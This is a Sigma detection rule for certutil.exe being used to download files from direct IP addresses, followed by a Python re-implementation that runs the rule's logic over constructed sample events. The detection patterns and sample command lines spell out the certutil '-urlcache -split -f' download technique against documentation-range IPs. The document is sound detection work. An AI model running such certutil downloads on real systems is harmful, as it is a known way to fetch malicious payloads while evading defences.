Suspicious File Downloaded From Direct IP Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Sigma rule
```yaml
title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
related:
    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
      type: similar
    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download
      type: similar
status: experimental
description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
references:
    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
    - https://twitter.com/egre55/status/1087685529016193025
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
    - https://twitter.com/_JohnHammond/status/1708910264261980634
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023/02/15
tags:
    - attack.defense_evasion
    - attack.t1027
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_flags:
        CommandLine|contains:
            - 'urlcache '
            - 'verifyctl '
    selection_http:
        CommandLine|contains:
            - '://1'
            - '://2'
            - '://3'
            - '://4'
            - '://5'
            - '://6'
            - '://7'
            - '://8'
            - '://9'
    # filter_local_ips:
    #     # Note: Uncomment this filter if you want to exclude local IPs
    #     CommandLine|contains:
    #         - '://10.' # 10.0.0.0/8
    #         - '://192.168.' # 192.168.0.0/16
    #         - '://172.16.' # 172.16.0.0/12
    #         - '://172.17.'
    #         - '://172.18.'
    #         - '://172.19.'
    #         - '://172.20.'
    #         - '://172.21.'
    #         - '://172.22.'
    #         - '://172.23.'
    #         - '://172.24.'
    #         - '://172.25.'
    #         - '://172.26.'
    #         - '://172.27.'
    #         - '://172.28.'
    #         - '://172.29.'
    #         - '://172.30.'
    #         - '://172.31.'
    #         - '://127.' # 127.0.0.0/8
    #         - '://169.254.' # 169.254.0.0/16
    filter_main_seven_zip:
        CommandLine|contains: '://7-' # For https://7-zip.org/
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
```
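To show how the rule's selections and filters combine, here is an added Python evaluation of the same logic over constructed process_creation events; it is illustrative code written for this page, not part of the Sigma project, and the event fields, sample command lines and documentation-range IPs are all assumed. It also applies the commented-out filter_local_ips block on request, so the effect of enabling it is visible.

```python
from dataclasses import dataclass

@dataclass
class ProcessEvent:  # one process_creation event (constructed sample, not real telemetry)
    image: str
    original_file_name: str
    command_line: str

DOWNLOAD_FLAGS = ("urlcache ", "verifyctl ")                # selection_flags
DIRECT_IP_PREFIXES = tuple(f"://{d}" for d in "123456789")  # selection_http: host starts with a digit
FILTER_MAIN = ("://7-",)                                     # filter_main_seven_zip (https://7-zip.org/)
# filter_local_ips is commented out in the rule; it is applied here only when requested
LOCAL_IP_PREFIXES = ("://10.", "://192.168.", "://127.", "://169.254.") + tuple(
    f"://172.{n}." for n in range(16, 32))

def matches_rule(ev: ProcessEvent, exclude_local_ips: bool = False) -> bool:
    """Evaluate 'all of selection_* and not 1 of filter_main_*'. Sigma string
    modifiers match case-insensitively, so both sides are lower-cased first."""
    image, cmd = ev.image.lower(), ev.command_line.lower()
    selection_img = (image.endswith("\\certutil.exe")
                     or ev.original_file_name.lower() == "certutil.exe")
    selection_flags = any(f in cmd for f in DOWNLOAD_FLAGS)
    selection_http = any(p in cmd for p in DIRECT_IP_PREFIXES)
    filter_main = any(f in cmd for f in FILTER_MAIN)
    filter_local = exclude_local_ips and any(p in cmd for p in LOCAL_IP_PREFIXES)
    return (selection_img and selection_flags and selection_http
            and not filter_main and not filter_local)

SYSTEM_CERTUTIL = r"C:\Windows\System32\certutil.exe"
# Constructed events; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_EVENTS = {
    "direct_ip": ProcessEvent(SYSTEM_CERTUTIL, "CertUtil.exe",
        "certutil.exe -urlcache -split -f http://203.0.113.5/update.txt C:\\Temp\\u.txt"),
    "renamed_binary": ProcessEvent(r"C:\Temp\ct.exe", "CertUtil.exe",
        "ct.exe -verifyctl -f http://198.51.100.7/x.txt"),
    "seven_zip": ProcessEvent(SYSTEM_CERTUTIL, "CertUtil.exe",
        "certutil.exe -urlcache -split -f https://7-zip.org/a/7zsetup.exe"),
    "hostname": ProcessEvent(SYSTEM_CERTUTIL, "CertUtil.exe",
        "certutil.exe -urlcache -split -f https://example.com/cert.cer"),
    "local_ip": ProcessEvent(SYSTEM_CERTUTIL, "CertUtil.exe",
        "certutil.exe -urlcache -f http://10.0.0.5/cert.cer cert.cer"),
}

def evaluate_samples(exclude_local_ips: bool = False) -> dict:
    """Run every constructed event through the rule; True means it would alert."""
    return {name: matches_rule(ev, exclude_local_ips) for name, ev in SAMPLE_EVENTS.items()}
```

The renamed-binary case matches only because OriginalFileName is checked alongside the image path, and the 7-zip case shows why filter_main_seven_zip exists: its hostname begins with a digit and would otherwise satisfy selection_http.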